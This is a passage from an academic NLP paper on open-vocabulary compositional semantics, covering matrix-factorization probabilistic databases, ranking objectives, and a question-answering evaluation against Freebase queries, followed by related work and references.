dent boolean random variable that is true with prob- ability: P(c(e) = TRUE) = σ(θTc φe) P(r(e1,e2) = TRUE) = σ(θ T r φ(e1,e2)) Above, σ(x) = e x 1+ex is the logistic function. In these equations, θc and θr represent k-dimensional vectors of per-predicate parameters, while φe and φ(e1,e2) represent k-dimensional vector embeddings of each entity and entity pair. This model contains a low-dimensional embedding of each predicate and entity such that each predicate’s denotation has a high probability of containing entities with nearby vectors. The probability that each variable is false is simply 1 minus the probability that it is true. This model can be viewed as matrix factorization, as depicted in Figure 1. The category and relation instance probabilities can be arranged in a pair of matrices of dimension |E| × |C| and |E|2 × |R|. Each row of these matrices represents an entity or entity pair, each column represents a category or re- lation, and each value is between 0 and 1 and rep- resents a truth probability (Figure 1, bottom right). These two matrices are factored into matrices of size |E|×k and k ×|C|, and |E|2 ×k and k ×|R|, re- spectively, containing k-dimensional embeddings of each entity, category, entity pair and relation (Figure 1, bottom left). These low-dimensional embeddings are represented by the parameters φ and θ. 5 Inference: Computing Marginal Probabilities Inference computes the marginal probability, over all possible worlds, that each entity is an element of a text’s denotation. In many cases – depending on the text – these marginal probabilities can be com- puted exactly in polynomial time. The inference problem is to calculate P(e ∈ γ|s) for each entity e. Because both the semantic parser P(`|s) and query evaluation P(γ|`,w) are deter- ministic, this problem can be rewritten as: P(e ∈ γ|s) = ∑ γ 1(e ∈ γ)P(γ|s) = ∑ w 1(e ∈ J`Kw)P(w) Above, ` represents the logical form for the text s produced by the rule-based semantic parser, and 1 represents the indicator function. The notation J`Kw represents denotation produced by (determin- istically) evaluating the logical form ` on world w. This inference problem corresponds to query eval- uation in a probabilistic database, which is #P-hard in general. Intuitively, this problem can be difficult because P(γ|s) is a joint distribution over sets of en- tities that can be exponentially large in the number of entities. However, a large subset of probabilistic database queries, known as safe queries, permit polynomial time evaluation (Dalvi and Suciu, 2007). Safe queries can be evaluated extensionally using a prob- abilistic notion of a denotation that treats each entity as independent. Let J`KP denote a probabilistic de- notation, which is a function from entities (or entity pairs) to probabilities, i.e., J`KP (e) ∈ [0,1]. The denotation of a logical form is then computed re- cursively, in the same manner as a non-probabilistic denotation, using probabilistic extensions of the typ- ical rules, such as: JcKP (e) = ∑ w P(w)1(wc,e) JrKP (e1,e2) = ∑ w P(w)1(wr,e1,e2) Jc1(x)∧ c2(x)KP (e) = Jc1KP (e)× Jc2KP (e) J∃y.r(x,y)KP (e) = 1− ∏ y∈E (1− JrKP (e,y)) 261 The first two rules are base cases that simply re- trieve predicate probabilities from the probabilistic database. The remaining rules compute the prob- abilistic denotation of a logical form from the de- notations of its parts.3 The formula for the prob- abilistic computation on the right of each of these rules is a straightforward consequence of the (as- sumed) independence of entities. For example, the last rule computes the probability of an OR of a set of independent random variables (indexed by y) us- ing the identity A ∨ B = ¬(¬A ∧¬B). For safe queries, J`KP (e) = P(e ∈ γ|s), that is, the proba- bilistic denotation computed according to the above rules is equal to the marginal probability distribu- tion. In practice, all of the queries in the experi- ments are safe, because they contain only one query variable and do not contain repeated predicates. For more information on query evaluation in probabilis- tic databases, we refer the reader to Suciu et al. (2011). Note that inference does not compute the most probable denotation, maxγ P(γ|s). In some sense, the most probable denotation is the correct output for a model-theoretic semantics. However, it is highly sensitive to the probabilities in the database, and in many cases it is empty (because a conjunction of independent boolean random variables is unlikely to be true). Producing a ranked list of entities is also useful for evaluation purposes. 6 Training The training problem in our approach is to learn pa- rameters θ and φ for the probabilistic database. We consider two different objective functions for learn- ing these parameters that use slightly different forms of training data. In both cases, training has two phases. First, we generate training data, in the form of observed assertions or query-answer pairs, by ap- plying the rule-based semantic parser to a corpus of entity-linked web text. Second, we optimize the parameters of the probabilistic database to rank ob- served assertions or answers above unobserved as- sertions or answers. 3This listing of rules is partial as it does not include, e.g., negation or joins between one-argument and two-argument log- ical forms. However, the corresponding rules are easy to derive. 6.1 Training Data Training data is generated by applying the process illustrated in Figure 3 to each sentence in an entity- linked web corpus. First, we apply our rule-based semantic parser to the sentence to produce a logi- cal form. Next, we extract portions of this logical form where every variable is bound to a particu- lar Freebase entity, resulting in a simplified logical form. Because the logical forms are existentially- quantified conjunctions of predicates, this step sim- ply discards any conjuncts in the logical form con- taining a variable that is not bound to a Freebase entity. From this simplified logical form, we gen- erate two types of training data: (1) predicate in- stances, and (2) queries with known answers (see Figure 3). In both cases, the corpus consists entirely of assumed-to-be-true statements, making obtaining negative examples a major challenge for training.4 6.2 Predicate Ranking Objective Riedel et al. (2013) introduced a ranking objective to work around the lack of negative examples in a sim- ilar matrix factorization problem. Their objective is a modified version of Bayesian Personalized Rank- ing (Rendle et al., 2009) that aims to rank observed predicate instances above unobserved instances. This objective function uses observed predicate instances (Figure 3, bottom left) as training data. This data consists of two collections, {(ci,ei)}ni=1 and {(rj, tj)}mj=1, of observed category and relation instances. We use tj to denote a tuple of entities, tj = (ej,1,ej,2), to simplify notation. The predicate ranking objective is: OP (θ,φ) = n∑ i=1 log σ(θTci(φei −φe′i)) + m∑ j=1 log σ(θTrj (φtj −φt′j )) where e′i is a randomly sampled entity such that (ci,e ′ i) does not occur in the training data. Simi- larly, t′j is a random entity tuple such that (rj, t ′ j) does not occur. Maximizing this function attempts 4A seemingly simple solution to this problem is to randomly generate negative examples; however, we empirically found that this approach performs considerably worse than both of the pro- posed ranking objectives. 262 Original sentence and logical form General Powell, appearing Sunday on CNN ’s Late Edition, said ... ∃w,x,y,z. w = /EN/POWELL ∧ GENERAL(w) ∧ APPEARING(w,x) ∧ SUNDAY(x) ∧ APPEARING ON(w,y) ∧y = /EN/LATE ∧ ’S(z,y)∧z = /EN/CNN ∧ SAID(w,...) Simplified logical form ∃w,y,z. w = /EN/POWELL ∧ GENERAL(w)∧ APPEARING ON(w,y)∧y = /EN/LATE ∧ ’S(z,y)∧z = /EN/CNN Instances Queries Answers GENERAL(/EN/POWELL) λw.GENERAL(w)∧ APPEARING ON(w, /EN/LATE) /EN/POWELL APPEARING ON(/EN/POWELL, /EN/LATE) λy.APPEARING ON(/EN/POWELL,y)∧ ’S(/EN/CNN,y) /EN/LATE ’S(/EN/CNN, /EN/LATE) λz.’S(z, /EN/LATE) /EN/CNN Figure 3: Illustration of training data generation applied to a single sentence. We generate two types of train- ing data, predicate instances and queries with observed answers, by semantically parsing the sentence and extracting portions of the generated logical form with observed entity arguments. The predicate instances are extracted from the conjuncts in the simplified logical form, and the queries are created by removing a single entity from the simplified logical form. to find θci , φei and φe′i such that P(ci(ei)) is larger than P(ci(e′i)) (and similarly for relations). During training, e′i and t ′ j are resampled on each pass over the data set according to each entity or tuple’s em- pirical frequency. 6.3 Query Ranking Objective The previous objective aims to rank the entities within each predicate well. However, such within- predicate rankings are insufficient to produce correct answers for queries containing multiple predicates – the scores for each predicate must further be cali- brated to work well with each other given the inde- pendence assumptions of the probabilistic database. We introduce a new training objective that encour- ages good rankings for entire queries instead of sin- gle predicates. The data for this objective consists of tuples, {(`i,ei)}ni=1, of a query `i with an ob- served answer ei (Figure 3, bottom right). Each `i is a function with exactly one entity argument, and `i(e) is a conjunction of predicate instances. For ex- ample, the last query in Figure 3 is a function of one argument z, and `(e) is a single predicate instance, ’S(e, /EN/LATE). The new objective aims to rank the observed entity answer above unobserved enti- ties for each query: OQ(θ,φ) = n∑ i=1 log Prank(`i,ei,e ′ i) Prank generalizes the approximate ranking prob- ability defined by the predicate ranking objec- tive to more general queries. The expression σ(θTc (φe − φe′)) in the predicate ranking objective can be viewed as an approximation of the prob- ability that e is ranked above e′ in category c. Prank uses this approximation for each individual predicate in the query. For example, given the query ` = λx.c(x) ∧ r(x,y) and entities (e,e′), Prank(`,e,e ′) = σ(θc(φe − φe′)) × σ(θr(φ(e,y) − φ(e′,y))). For this objective, we sample e ′ i such that (`i,e ′ i) does not occur in the training data. When `’s body consists of a conjunction of pred- icates, the query ranking objective simplifies con- siderably. In this case, ` can be described as three sets of one-argument functions: categories C(`) = {λx.c(x)}, left arguments of relations RL(`) = {λx.r(x,y)}, and right arguments of re- lations RR(`) = {λx.r(y,x)}. Furthermore, Prank is a product so we can distribute the log: OQ(θ,φ) = n∑ i=1 ∑ λx.c(x)∈C(`i) log σ(θc(φei −φe′i)) + ∑ λx.r(x,y)∈RL(`i) log σ(θr(φ(ei,y) −φ(e′i,y))) + ∑ λx.r(y,x)∈RR(`i) log σ(θr(φ(y,ei) −φ(y,e′i))) This simplification reveals that the main differ- ence between OQ and OP is the sampling of the unobserved entities e′ and tuples t′. OP samples them in an unconstrained fashion from their empir- ical distributions for every predicate. OQ considers 263 the larger context in which each predicate occurs, with two major effects. First, more negative exam- ples are generated for categories because the logical forms ` are more specific. For example, both “pres- ident of Sprint” and “president of the US” generate instances of the PRESIDENT predicate; OQ will use entities that only occur with one of these as negative examples for the other. Second, the relation param- eters are trained to rank tuples with a shared argu- ment, as opposed to tuples in general. Note that, although Prank generalizes to more complex logical forms than existentially-quantified conjunctions, training with these logical forms is more difficult because Prank is no longer a product. In these cases, it becomes necessary to perform in- ference within the gradient computation, which can be expensive. The restriction to conjunctions makes inference trivial, enabling the factorization above. 7 Evaluation We evaluate our approach to compositional seman- tics on a question answering task. Each test exam- ple is a (compositional) natural language question whose answer is a set of Freebase entities. We com- pare our open domain approach to several baselines based on prior work, as well as a human-annotated Freebase query for each example. 7.1 Data We used Clueweb09 web corpus5 with the corre- sponding Google FACC entity linking (Gabrilovich et al., 2013) to create the training and test data for our experiments. The training data is derived from 3 million webpages, and contains 2.1m predicate in- stances, 1.1m queries, 172k entities and 181k entity pairs. Predicates that appeared fewer than 6 times in the training data were replaced with the predicate UNK, resulting in 25k categories and 2.2k relations. Our test data consists of fill-in-the-blank natu- ral language questions such as “Incan emperor ” or “Cunningham directed Auchtre’s second music video .” These questions were created by apply- ing the training data generation process (Section 6.1) to a collection of held-out webpages. Each natural language question has a corresponding logical form 5http://www.lemurproject.org/clueweb09. php # of questions 220 Avg. # of predicates / query 2.77 Avg. # of categories / query 1.75 Avg. # of relations / query 1.02 Avg. # of answers / query 1.92 # of questions with ≥ 1 answer 116 (found by at least one system) Table 1: Statistics of the test data set. query containing at least one category and relation. We chose not to use existing data sets for seman- tic parsing into Freebase as our goal is to model the semantics of language that cannot necessarily be modelled using the Freebase schema. Existing data sets, such as Free917 (Cai and Yates, 2013) and We- bQuestions (Berant et al., 2013), would not allow us to evaluate performance on this subset of language. Consequently, we evaluate our system on a new data set with unconstrained language. However, we do compare our approach against manually-annotated Freebase queries on our new data set (Section 7.5). All of the data for our experiments is available at http://rtw.ml.cmu.edu/tacl2015_csf. 7.2 Methodology Our evaluation methodology is inspired by infor- mation retrieval evaluations (Manning et al., 2008). Each system predicts a ranked list of 100 answers for each test question. We then pool the top 30 an- swers of each system and manually judge their cor- rectness. The correct answers from the pool are then used to evaluate the precision and recall of each sys- tem. In particular, we compute average precision (AP) for each question and report the mean average precision (MAP) across all questions. We also re- port a weighted version of MAP, where each ques- tion’s AP is weighted by its number of annotated correct answers. Average precision is computed as 1 m ∑m k=1 Prec(k) × Correct(k), where Prec(k) is the precision at rank k, Correct(k) is an indicator function for whether the kth answer is correct, and m is the number of returned answers (at most 100). Statistics of the annotated test set are shown in Table 1. A consequence of our unconstrained data generation approach is that some test questions are difficult to answer: of the 220 queries, at least one system was able to produce a correct answer for 116. The remaining questions are mostly unanswerable 264 MAP Weighted MAP CLUSTERING 0.224 0.266 CORPUSLOOKUP 0.246 0.296 FACTORIZATION (OP ) 0.299 0.473 FACTORIZATION (OQ) 0.309 0.492 ENSEMBLE (OP ) 0.391 0.614 ENSEMBLE (OQ) 0.406 0.645 Upper bound 0.527 1.0 Table 2: Mean average precision for our question answering task. The difference in MAP between each pair of adjacent models is statistically signifi- cant (p < .05) via the sign test. because they reference rare entities unseen in the training data. 7.3 Models and Baselines We implemented two baseline models based on ex- isting techniques. The CORPUSLOOKUP baseline answers test questions by directly using the predi- cate instances in the training data as its knowledge base. For example, given the query λx.CEO(x) ∧ OF(x, /EN/SPRINT), this model will return the set of entities e such that CEO(e) and OF(e, /EN/SPRINT) both appear in the training data. All answers found in this fashion are assigned probability 1. The CLUSTERING baseline first clusters the pred- icates in the training corpus, then answers ques- tions using the clustered predicates. The clustering aggregates predicates with similar denotations, ide- ally identifying synonyms to smooth over sparsity in the training data. Our approach is closely based on Lewis and Steedman (2013), though is also con- ceptually related to approaches such as DIRT (Lin and Pantel, 2001) and USP (Poon and Domingos, 2009). We use the Chinese Whispers clustering al- gorithm (Biemann, 2006) and calculate the similar- ity between predicates as the cosine similarity of their TF-IDF weighted entity count vectors. The de- notation of each cluster is the union of the denota- tions of the clustered predicates, and each entity in the denotation is assigned probability 1. We also trained two probabilistic database mod- els, FACTORIZATION (OP ) and FACTORIZATION (OQ), using the two objective functions described in Sections 6.2 and 6.3, respectively. We optimized both objectives by performing 100 passes over the Recall P re ci si on ENS. (OQ) ENS. (OP ) FACT. (OQ) FACT. (OP ) C.LOOKUP CLUSTERING 0 0.2 0.4 0.6 0.8 1.0 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0 b b b b b b b b b b b + + + + + + + + + + + r r r r r r r r r r r u u u u u u u u u u u b b b b b b b b b b b + + + + + + + + + + + Figure 4: Averaged 11-point precision/recall curves for the 116 answerable test questions. training data with AdaGrad (Duchi et al., 2011) us- ing an L2 regularization parameter of λ = 10−4. The predicate and entity embeddings have 300 di- mensions. These parameters were selected on the basis of preliminary experiments with a small vali- dation set. Finally, we observed that CORPUSLOOKUP has high precision but low recall, while both matrix fac- torization models have high recall with somewhat lower precision. This observation suggested that an ensemble of CORPUSLOOKUP and FACTORIZA- TION could outperform either model individually. We created two ensembles, ENSEMBLE (OP ) and ENSEMBLE (OQ), by calculating the probability of each predicate as a 50/50 mixture of each model’s predicted probability. 7.4 Results Table 2 shows the results of our MAP evaluation, and Figure 4 shows a precision/recall curve for each model. The MAP numbers are somewhat low be- cause almost half of the test questions have no cor- rect answers and all models get an average preci- sion of 0 on these questions. The upper bound on MAP is the fraction of questions with at least 1 correct answer. Note that the models perform well on the answerable questions, as reflected by the ra- tio of the achieved MAP to the upper bound. The weighted MAP metric also corrects for these unan- swerable questions, as they are assigned 0 weight in the weighted average. These results demonstrate several findings. First, we find that both FACTORIZATION models outper- form the baselines in both MAP and weighted MAP. 265 # of questions w/ an annotated MQL query 142 query returns > 1 answer 95 query returns no answers 47 # of questions w/o an MQL query 78 Table 3: Statistics of the Freebase MQL queries an- notated for the test data set. The performance improvement seems to be most significant in the high recall regime (right side of Figure 4). Second, we find that the query ranking objective OQ improves performance over the predi- cate ranking objective OP by 2-4% on the answer- able queries. The precision/recall curves show that this improvement is concentrated in the low recall regime. Finally, the ensemble models are consider- ably better than their component models; however, even in the ensembled models, we find that OQ out- performs OP by a few percent. 7.5 Comparison to Semantic Parsing to Freebase A natural question is whether our open vocabu- lary approach outperforms a closed approach for the same problem, such as semantic parsing to Freebase (e.g., Reddy et al. (2014)). In order to answer this question, we compared our best performing model to a manually-annotated Freebase query for each test question. This comparison allows us to understand the relative advantages of open and closed predicate vocabularies. The first author manually annotated a Freebase MQL query for each natural language question in the test data set. This annotation is somewhat sub- jective, as many of the questions can only be inex- actly mapped on to the Freebase schema. We used the following guidelines in performing the map- ping: (1) all relations in the text must be mapped to one or more Freebase relations, (2) all enti- ties mentioned in the text must be included in the query, (3) adjective modifiers can be ignored and (4) entities not mentioned in the text may be in- cluded in the query. The fourth condition is nec- essary because many one-place predicates, such as MAYOR(x), are represented in Freebase using a binary relation to a particular entity, such as GOVERNMENT OFFICE/TITLE(x, /EN/MAYOR). Statistics of the annotated queries are shown in MAP ENSEMBLE (OQ) 0.263 Freebase 0.385 Table 4: Mean average precision of our best per- forming model compared to a manually annotated Freebase query for each test question. Table 3. Coverage is reasonably high: we were able to annotate a Freebase query for 142 questions (65% of the test set). The remaining unannotatable ques- tions are due to missing predicates in Freebase, such as a relation defining the emperor of the Incan em- pire. Of the 142 annotated Freebase queries, 95 of them return at least one entity answer. The queries with no answers typically reference uncommon en- tities which have few or no known relation instances in Freebase. The annotated queries contain an aver- age of 2.62 Freebase predicates. We compared our best performing model, EN- SEMBLE (OQ), to the manually annotated Freebase queries using the same pooled evaluation methodol- ogy. The set of correct answers contains the correct predictions of ENSEMBLE (OQ) from the previous evaluation along with all answers from Freebase. Results from this evaluation are shown in Table 4.6 In terms of overall MAP, Freebase outperforms our approach by a fair margin. However, this ini- tial impression belies a more complex reality, which is shown in Table 5. This table compares both ap- proaches by their relative performance on each test question. On approximately one-third of the ques- tions, Freebase has a higher AP than our approach. On another third, our approach has a higher AP than Freebase. On the final third, both approaches per- form equally well – these are typically questions where neither approach returns any correct answers (67 of the 75). Freebase outperforms in the over- all MAP evaluation because it tends to return more correct answers to each question. Note that the annotated Freebase queries have several advantages in this evaluation. First, Freebase contains significantly more predicate instances than our training data, which allows it to produce more complete answers. Second, the Freebase queries 6The numbers in this table are not comparable to the num- bers in Table 2 as the correct answers for each question are dif- ferent. 266 # of queries Freebase higher AP 75 (34%) equal AP 75 (34%) ENSEMBLE (OQ) higher AP 70 (31%) Table 5: Question-by-question comparison of model performance. Each test question is placed into one of the three buckets above, depending on whether Freebase or ENSEMBLE (OQ) achieves a better av- erage precision (AP) for the question. correspond to the performance of a perfect semantic parser, while current semantic parsers achieve accu- racies around 68% (Berant and Liang, 2014). The results from this experiment suggest that closed and open predicate vocabularies are comple- mentary. Freebase produces high quality answers when it covers a question. However, many of the re- maining questions can be answered correctly using an open vocabulary approach like ours. This evalu- ation also suggests that recall is a limiting factor of our approach; in the future, recall can be improved by using a larger corpus or including Freebase in- stances during training. 8 Related Work Open Predicate Vocabularies There has been considerable work on generating semantic representations with an open predicate vo- cabulary. Much of the work is non-compositional, focusing on identifying similar predicates and enti- ties. DIRT (Lin and Pantel, 2001), Resolver (Yates and Etzioni, 2007) and other systems (Yao et al., 2012) cluster synonymous expressions in a corpus of relation triples. Matrix factorization is an alter- native approach to clustering that has been used for relation extraction (Riedel et al., 2013; Yao et al., 2013) and finding analogies (Turney, 2008; Speer et al., 2008). All of this work is closely related to dis- tributional semantics, which uses distributional in- formation to identify semantically similar words and phrases (Turney and Pantel, 2010; Griffiths et al., 2007). Some work has considered the problem of com- positional semantics with an open predicate vocab- ulary. Unsupervised semantic parsing (Poon and Domingos, 2009; Titov and Klementiev, 2011) is a clustering-based approach that incorporates com- position using a generative model for each sentence that factors according to its parse tree. Lewis and Steedman (2013) also present a clustering-based ap- proach that uses CCG to perform semantic compo- sition. This approach is similar to ours, except that we use matrix factorization and Freebase entities. Finally, some work has focused on the problem of textual inference within this paradigm. Fader et al. (2013) present a question answering system that learns to paraphrase a question so that it can be an- swered using a corpus of Open IE triples (Fader et al., 2011). Distributional similarity has also been used to learn weighted logical inference rules that can be used for recognizing textual entailment or identifying semantically similar text (Garrette et al., 2011; Garrette et al., 2013; Beltagy et al., 2013). This line of work focuses on performing inference between texts, whereas our work computes a text’s denotation. A significant difference between our work and most of the related work above is that our work computes denotations containing Freebase entities. Using these entities has two advantages: (1) it en- ables us to use entity linking to disambiguate textual mentions, and (2) it facilitates a comparison against alternative approaches that rely on a closed predi- cate vocabulary. Disambiguating textual mentions is a major challenge for previous approaches, so an entity-linked corpus is a much cleaner source of data. However, our approach could also work with automatically constructed entities, for example, cre- ated by clustering mentions in an unsupervised fash- ion (Singh et al., 2011). Semantic Parsing Several semantic parsers have been developed for Freebase (Cai and Yates, 2013; Kwiatkowski et al., 2013; Berant et al., 2013; Berant and Liang, 2014). Our approach is most similar to that of Reddy et al. (2014), which uses fixed syntactic parses of unla- beled text to train a Freebase semantic parser. Like our approach, this system automatically-generates query/answer pairs for training. However, this sys- tem, like all Freebase semantic parsers, uses a closed predicate vocabulary consisting of only Freebase predicates. In contrast, our approach uses an open predicate vocabulary and can learn denotations for words whose semantics cannot be represented using 267 Freebase predicates. Consequently, our approach can answer many questions that these Freebase se- mantic parsers cannot (see Section 7.5). The rule-based semantic parser used in this pa- per is very similar to several other rule-based sys- tems that produce logical forms from syntactic CCG parses (Bos, 2008; Lewis and Steedman, 2013). We developed our own system in order to have control over the particulars of the analysis; however, our ap- proach is compatible with these systems as well. Probabilistic Databases Our system assigns a model-theoretic semantics to statements in natural language (Dowty et al., 1981) using a learned distribution over possible worlds. This distribution is concisely represented in a probabilistic database, which can be viewed as a simple Markov Logic Network (Richardson and Domingos, 2006) where all of the random vari- ables are independent. This independence simplifies query evaluation: probabilistic databases permit ef- ficient exact inference for safe queries (Suciu et al., 2011), and approximate inference for the remain- der (Gatterbauer et al., 2010; Gatterbauer and Suciu, 2015). 9 Discussion This paper presents an approach for compositional semantics with an open predicate vocabulary. Our approach defines a probabilistic model over deno- tations (sets of Freebase entities) conditioned on an input text. The model has two components: a rule- based semantic parser that produces a logical form for the text, and a probabilistic database that defines a distribution over denotations for each predicate. A training phase learns the probabilistic database by applying probabilistic matrix factorization with a query/answer ranking objective to logical forms de- rived from a large, entity-linked web corpus. An ex- perimental analysis demonstrates that this approach outperforms several baselines and can answer many questions that cannot be answered by semantic pars- ing into Freebase. Our approach learns a model-theoretic semantics for natural language text tied to Freebase, as do some semantic parsers, except with an open predi- cate vocabulary. This difference influences several other aspects of the system’s design. First, because no knowledge base with the necessary knowledge exists, the system is forced to learn its knowledge base (in the form of a probabilistic database). Sec- ond, the system can directly map syntactic CCG parses to logical forms, as it is no longer neces- sary to map words to a closed vocabulary of knowl- edge base predicates. In some sense, our approach is the exact opposite of the typical semantic pars- ing approach: usually, the semantic parser is learned and the knowledge base is fixed; here, the knowl- edge base is learned and the semantic parser is fixed. From a machine learning perspective, train- ing a probabilistic database via matrix factorization is easier than training a semantic parser, as there are no difficult inference problems. However, it remains to be seen whether a learned knowledge base can achieve similar recall as a fixed knowledge base on the subset of language it covers. There are two limitations of this work. The most obvious limitation is the restriction to existentially quantified conjunctions of predicates. This limita- tion is not inherent to the approach, however, and can be removed in future work by using a system like Boxer (Bos, 2008) for semantic parsing. A more serious limitation is the restriction to one- and two-argument predicates, which prevents our system from representing events and n-ary relations. Con- ceptually, a similar matrix factorization approach could be used to learn embeddings for n-ary entity tuples; however, in practice, the sparsity of these tu- ples makes learning challenging. Developing meth- ods for learning n-ary relations is an important prob- lem for future work. A direction for future work is scaling up the size of the training corpus to improve recall. Low re- call is the main limitation of our current system as demonstrated by the experimental analysis. Both stages of training, the data generation and matrix factorization, can be parallelized using a cluster. All of the relation instances in Freebase can also be added to the training corpus. It should be feasible to increase the quantity of training data by a factor of 10-100, for example, to train on all of ClueWeb. Scaling up the training data may allow a semantic parser with an open predicate vocabulary to outper- form comparable closed vocabulary systems. 268 Acknowledgments This research was supported in part by DARPA un- der contract number FA8750-13-2-0005, and by a generous grant from Google. We additionally thank Matt Gardner, Ndapa Nakashole, Amos Azaria and the anonymous reviewers for their helpful com- ments. References Michele Banko, Michael J. Cafarella, Stephen Soderland, Matt Broadhead, and Oren Etzioni. 2007. Open infor- mation extraction from the web. In Proceedings of the 20th International Joint Conference on Artifical Intel- ligence. Islam Beltagy, Cuong Chau, Gemma Boleda, Dan Gar- rette, Katrin Erk, and Raymond Mooney. 2013. Mon- tague meets markov: Deep semantics with probabilis- tic logical form. In Second Joint Conference on Lexi- cal and Computational Semantics (*SEM), Volume 1: Proceedings of the Main Conference and the Shared Task: Semantic Textual Similarity. Jonathan Berant and Percy Liang. 2014. Semantic pars- ing via paraphrasing. In Proceedings of the 52nd An- nual Meeting of the Association for Computational Linguistics. Jonathan Berant, Andrew Chou, Roy Frostig, and Percy Liang. 2013. Semantic parsing on Freebase from question-answer pairs. In Proceedings of the 2013 Conference on Empirical Methods in Natural Lan- guage Processing. Chris Biemann. 2006. Chinese whispers: An efficient graph clustering algorithm and its application to natu- ral language processing problems. In Proceedings of the First Workshop on Graph Based Methods for Nat- ural Language Processing. Johan Bos. 2008. Wide-coverage semantic analysis with boxer. In Proceedings of the 2008 Conference on Se- mantics in Text Processing. Qingqing Cai and Alexander Yates. 2013. Large-scale Semantic Parsing via Schema Matching and Lexicon Extension. In Proceedings of the Annual Meeting of the Association for Computational Linguistics (ACL). Nilesh Dalvi and Dan Suciu. 2007. Efficient query eval- uation on probabilistic databases. The VLDB Journal, 16(4), October. David R. Dowty, Robert E. Wall, and Stanley Peters. 1981. Introduction to Montague Semantics. John Duchi, Elad Hazan, and Yoram Singer. 2011. Adaptive subgradient methods for online learning and stochastic optimization. Journal of Machine Learning Research, 12:2121–2159, July. Anthony Fader, Stephen Soderland, and Oren Etzioni. 2011. Identifying relations for open information ex- traction. In Proceedings of the Conference on Empiri- cal Methods in Natural Language Processing. Anthony Fader, Luke Zettlemoyer, and Oren Etzioni. 2013. Paraphrase-driven learning for open question answering. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics. Evgeniy Gabrilovich, Michael Ringgaard, and Amar- nag Subramanya. 2013. FACC1: Freebase anno- tation of ClueWeb corpora, Version 1 (Release date 2013-06-26, Format version 1, Correction level 0). http://lemurproject.org/clueweb09/. Dan Garrette, Katrin Erk, and Raymond Mooney. 2011. Integrating logical representations with probabilistic information using markov logic. In Proceedings of the International Conference on Computational Seman- tics. Dan Garrette, Katrin Erk, and Raymond J. Mooney. 2013. A formal approach to linking logical form and vector-space lexical semantics. In Harry Bunt, Johan Bos, and Stephen Pulman, editors, Computing Mean- ing, volume 4, pages 27–48. Wolfgang Gatterbauer and Dan Suciu. 2015. Approx- imate lifted inference with probabilistic databases. Proceedings of the VLDB Endowment, 8(5), January. Wolfgang Gatterbauer, Abhay Kumar Jha, and Dan Su- ciu. 2010. Dissociation and propagation for efficient query evaluation over probabilistic databases. In Pro- ceedings of the Fourth International VLDB workshop on Management of Uncertain Data (MUD 2010) in conjunction with VLDB 2010, Singapore, September 13, 2010. Thomas L. Griffiths, Joshua B. Tenenbaum, and Mark Steyvers. 2007. Topics in semantic representation. Psychological Review 114. Julia Hockenmaier and Mark Steedman. 2002. Acquir- ing compact lexicalized grammars from a cleaner tree- bank. In Proceedings of Third International Confer- ence on Language Resources and Evaluation. Jayant Krishnamurthy and Tom M. Mitchell. 2012. Weakly supervised training of semantic parsers. In Proceedings of the 2012 Joint Conference on Empir- ical Methods in Natural Language Processing and Computational Natural Language Learning. Jayant Krishnamurthy and Tom M. Mitchell. 2014. Joint syntactic and semantic parsing with combinatory cat- egorial grammar. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguis- tics. Tom Kwiatkowski, Eunsol Choi, Yoav Artzi, and Luke Zettlemoyer. 2013. Scaling semantic parsers with on-the-fly ontology matching. In Proceedings of the 269 2013 Conference on Empirical Methods in Natural Language Processing. Mike Lewis and Mark Steedman. 2013. Combined distributional and logical semantics. Transactions of the Association for Computational Linguistics, 1:179– 192. Dekang Lin and Patrick Pantel. 2001. DIRT — discov- ery of inference rules from text. In Proceedings of the Seventh ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. Christopher D. Manning, Prabhakar Raghavan, and Hin- rich Schütze. 2008. Introduction to Information Re- trieval. Cambridge University Press, New York, NY, USA. David Milne and Ian H. Witten. 2008. Learning to link with wikipedia. In Proceedings of the 17th ACM Con- ference on Information and Knowledge Management. Hoifung Poon and Pedro Domingos. 2009. Unsuper- vised semantic parsing. In Proceedings of the 2009 Conference on Empirical Methods in Natural Lan- guage Processing. Lev Ratinov, Dan Roth, Doug Downey, and Mike An- derson. 2011. Local and global algorithms for dis- ambiguation to wikipedia. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Human Language Technologies. Siva Reddy, Mirella Lapata, and Mark Steedman. 2014. Large-scale semantic parsing without question-answer pairs. Transactions of the Association of Computa- tional Linguistics – Volume 2, Issue 1. Steffen Rendle, Christoph Freudenthaler, Zeno Gantner, and Lars Schmidt-Thieme. 2009. BPR: Bayesian per- sonalized ranking from implicit feedback. In Proceed- ings of the Twenty-Fifth Conference on Uncertainty in Artificial Intelligence. Matthew Richardson and Pedro Domingos. 2006. Markov logic networks. Machine Learning, 62(1- 2):107–136, February. Sebastian Riedel, Limin Yao, Andrew McCallum, and Benjamin M. Marlin. 2013. Relation extraction with matrix factorization and universal schemas. In Joint Human Language Technology Conference/Annual Meeting of the North American Chapter of the Asso- ciation for Computational Linguistics. Sameer Singh, Amarnag Subramanya, Fernando Pereira, and Andrew McCallum. 2011. Large-scale cross- document coreference using distributed inference and hierarchical models. In Association for Computa- tional Linguistics: Human Language Technologies (ACL HLT). Robert Speer, Catherine Havasi, and Henry Lieberman. 2008. AnalogySpace: Reducing the dimensionality of common sense knowledge. In AAAI. Dan Suciu, Dan Olteanu, Christopher Ré, and Christoph Koch. 2011. Probabilistic databases. Synthesis Lec- tures on Data Management, 3(2):1–180. Ivan Titov and Alexandre Klementiev. 2011. A bayesian model for unsupervised semantic parsing. In Proceed- ings of the 49th Annual Meeting of the Association for Computational Linguistics. Peter D. Turney and Patrick Pantel. 2010. From fre- quency to meaning: vector space models of semantics. Journal of Artificial Intelligence Research, 37(1), Jan- uary. Peter D. Turney. 2008. The latent relation mapping en- gine: Algorithm and experiments. Journal of Artificial Intelligence Research, 33(1):615–655, December. Mohamed Yahya, Klaus Berberich, Shady Elbassuoni, Maya Ramanath, Volker Tresp, and Gerhard Weikum. 2012. Natural language questions for the web of data. In Proceedings of the 2012 Joint Conference on Em- pirical Methods in Natural Language Processing and Computational Natural Language Learning. Limin Yao, Sebastian Riedel, and Andrew McCallum. 2012. Unsupervised relation discovery with sense dis- ambiguation. In Proceedings of the 50th Annual Meet- ing of the Association for Computational Linguistics: Long Papers - Volume 1. Limin Yao, Sebastian Riedel, and Andrew McCallum. 2013. Universal schema for entity type prediction. In Proceedings of the 2013 Workshop on Automated Knowledge Base Construction. Alexander Yates and Oren Etzioni. 2007. 